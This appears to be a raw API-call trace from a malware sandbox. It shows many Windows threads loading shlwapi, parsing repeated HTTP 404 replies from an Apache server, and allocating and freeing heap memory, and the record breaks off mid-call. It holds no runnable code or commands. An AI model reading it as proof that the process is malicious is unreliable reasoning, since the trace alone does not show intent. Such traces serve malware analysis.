1 [0333.899] GetProcessHeap () returned 0x840000 [0333.899] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 Thread: id = 44 os_tid = 0x3a4 Thread: id = 52 os_tid = 0xd4c [0188.688] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0188.688] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:26:27 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0188.689] GetProcessHeap () returned 0x840000 [0188.690] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0188.690] GetProcessHeap () returned 0x840000 [0188.690] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0188.690] GetProcessHeap () returned 0x840000 [0188.690] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f220 | out: hHeap=0x840000) returned 1 Thread: id = 53 os_tid = 0xe68 [0200.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0200.006] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:26:39 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0200.006] GetProcessHeap () returned 0x840000 [0200.006] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0200.006] GetProcessHeap () returned 0x840000 [0200.006] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0200.006] GetProcessHeap () returned 0x840000 [0200.006] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 54 os_tid = 0xc6c [0210.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0210.727] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:26:49 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0210.727] GetProcessHeap () returned 0x840000 [0210.727] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0210.727] GetProcessHeap () returned 0x840000 [0210.727] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0210.727] GetProcessHeap () returned 0x840000 [0210.727] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 55 os_tid = 0x464 Thread: id = 56 os_tid = 0x1344 Thread: id = 57 os_tid = 0xfcc [0211.278] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0211.278] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:26:50 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0211.278] GetProcessHeap () returned 0x840000 [0211.278] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0211.279] GetProcessHeap () returned 0x840000 [0211.279] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0211.279] GetProcessHeap () returned 0x840000 [0211.279] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 58 os_tid = 0xfec [0211.985] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0211.986] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:26:51 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0211.986] GetProcessHeap () returned 0x840000 [0211.986] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0211.986] GetProcessHeap () returned 0x840000 [0211.986] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0211.986] GetProcessHeap () returned 0x840000 [0211.986] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 59 os_tid = 0x1160 [0212.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0212.509] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:26:51 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0212.509] GetProcessHeap () returned 0x840000 [0212.509] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0212.509] GetProcessHeap () returned 0x840000 [0212.509] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0212.509] GetProcessHeap () returned 0x840000 [0212.509] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 60 os_tid = 0x37c [0213.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0213.371] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:26:52 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0213.371] GetProcessHeap () returned 0x840000 [0213.371] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0213.371] GetProcessHeap () returned 0x840000 [0213.371] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0213.371] GetProcessHeap () returned 0x840000 [0213.371] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 61 os_tid = 0x1290 [0215.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0215.703] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:26:53 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0215.703] GetProcessHeap () returned 0x840000 [0215.703] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0215.703] GetProcessHeap () returned 0x840000 [0215.703] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0215.703] GetProcessHeap () returned 0x840000 [0215.703] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 62 os_tid = 0xea0 [0216.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0216.338] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:26:55 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0216.338] GetProcessHeap () returned 0x840000 [0216.338] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0216.338] GetProcessHeap () returned 0x840000 [0216.338] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0216.338] GetProcessHeap () returned 0x840000 [0216.338] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 63 os_tid = 0xee4 [0216.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0216.902] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:26:55 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0216.902] GetProcessHeap () returned 0x840000 [0216.902] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0216.902] GetProcessHeap () returned 0x840000 [0216.903] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0216.903] GetProcessHeap () returned 0x840000 [0216.903] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 64 os_tid = 0x828 [0217.509] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0217.510] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:26:56 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0217.510] GetProcessHeap () returned 0x840000 [0217.510] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0217.510] GetProcessHeap () returned 0x840000 [0217.510] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0217.510] GetProcessHeap () returned 0x840000 [0217.510] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 65 os_tid = 0x188 [0218.113] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0218.114] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:26:57 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0218.114] GetProcessHeap () returned 0x840000 [0218.114] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0218.114] GetProcessHeap () returned 0x840000 [0218.114] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0218.114] GetProcessHeap () returned 0x840000 [0218.114] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 66 os_tid = 0x134c [0218.650] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0218.650] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:26:57 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0218.651] GetProcessHeap () returned 0x840000 [0218.651] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0218.651] GetProcessHeap () returned 0x840000 [0218.651] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0218.651] GetProcessHeap () returned 0x840000 [0218.651] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 67 os_tid = 0xe88 [0219.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0219.222] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:26:58 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0219.222] GetProcessHeap () returned 0x840000 [0219.222] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0219.222] GetProcessHeap () returned 0x840000 [0219.222] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0219.222] GetProcessHeap () returned 0x840000 [0219.222] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 68 os_tid = 0x128c [0219.737] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0219.737] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:26:58 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0219.741] GetProcessHeap () returned 0x840000 [0219.741] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0219.742] GetProcessHeap () returned 0x840000 [0219.742] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0219.742] GetProcessHeap () returned 0x840000 [0219.742] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 69 os_tid = 0x70 [0220.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0220.332] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:26:59 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0220.332] GetProcessHeap () returned 0x840000 [0220.332] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0220.332] GetProcessHeap () returned 0x840000 [0220.332] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0220.332] GetProcessHeap () returned 0x840000 [0220.332] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 70 os_tid = 0x924 [0220.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0220.973] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:00 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0220.973] GetProcessHeap () returned 0x840000 [0220.973] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0220.973] GetProcessHeap () returned 0x840000 [0220.973] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0220.973] GetProcessHeap () returned 0x840000 [0220.973] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 71 os_tid = 0xa08 [0221.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0221.646] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:00 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0221.646] GetProcessHeap () returned 0x840000 [0221.646] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0221.646] GetProcessHeap () returned 0x840000 [0221.646] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0221.646] GetProcessHeap () returned 0x840000 [0221.646] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 72 os_tid = 0x12a4 [0222.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0222.176] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:01 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0222.176] GetProcessHeap () returned 0x840000 [0222.176] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0222.176] GetProcessHeap () returned 0x840000 [0222.176] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0222.176] GetProcessHeap () returned 0x840000 [0222.176] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 73 os_tid = 0xdd4 [0222.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0222.678] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:01 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0222.678] GetProcessHeap () returned 0x840000 [0222.678] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0222.678] GetProcessHeap () returned 0x840000 [0222.678] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0222.678] GetProcessHeap () returned 0x840000 [0222.678] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 74 os_tid = 0x36c [0223.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0223.214] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:02 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0223.214] GetProcessHeap () returned 0x840000 [0223.214] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0223.214] GetProcessHeap () returned 0x840000 [0223.214] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0223.214] GetProcessHeap () returned 0x840000 [0223.214] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 75 os_tid = 0xf88 [0223.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0223.779] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:02 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0223.779] GetProcessHeap () returned 0x840000 [0223.780] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0223.780] GetProcessHeap () returned 0x840000 [0223.780] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0223.780] GetProcessHeap () returned 0x840000 [0223.780] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 76 os_tid = 0x5c4 [0224.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0224.317] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:03 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0224.317] GetProcessHeap () returned 0x840000 [0224.317] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0224.317] GetProcessHeap () returned 0x840000 [0224.317] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0224.317] GetProcessHeap () returned 0x840000 [0224.317] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 77 os_tid = 0x1c4 [0224.869] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0224.869] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:04 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0224.869] GetProcessHeap () returned 0x840000 [0224.869] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0224.869] GetProcessHeap () returned 0x840000 [0224.869] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0224.869] GetProcessHeap () returned 0x840000 [0224.869] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 78 os_tid = 0x5cc [0225.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0225.383] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:04 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0225.383] GetProcessHeap () returned 0x840000 [0225.383] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0225.383] GetProcessHeap () returned 0x840000 [0225.384] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0225.384] GetProcessHeap () returned 0x840000 [0225.384] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 79 os_tid = 0x5c8 [0225.953] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0225.954] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:05 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0225.954] GetProcessHeap () returned 0x840000 [0225.954] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0225.954] GetProcessHeap () returned 0x840000 [0225.954] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0225.954] GetProcessHeap () returned 0x840000 [0225.954] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 80 os_tid = 0x5b0 [0226.585] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0226.586] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:05 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0226.586] GetProcessHeap () returned 0x840000 [0226.586] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0226.586] GetProcessHeap () returned 0x840000 [0226.586] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0226.586] GetProcessHeap () returned 0x840000 [0226.586] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 81 os_tid = 0xda8 [0227.407] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0227.408] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:06 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0227.408] GetProcessHeap () returned 0x840000 [0227.409] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0227.409] GetProcessHeap () returned 0x840000 [0227.409] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0227.409] GetProcessHeap () returned 0x840000 [0227.409] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 82 os_tid = 0xf74 [0227.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0227.982] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:07 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0227.982] GetProcessHeap () returned 0x840000 [0227.982] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0227.982] GetProcessHeap () returned 0x840000 [0227.982] HeapFree (in: hHeap=0x840000, 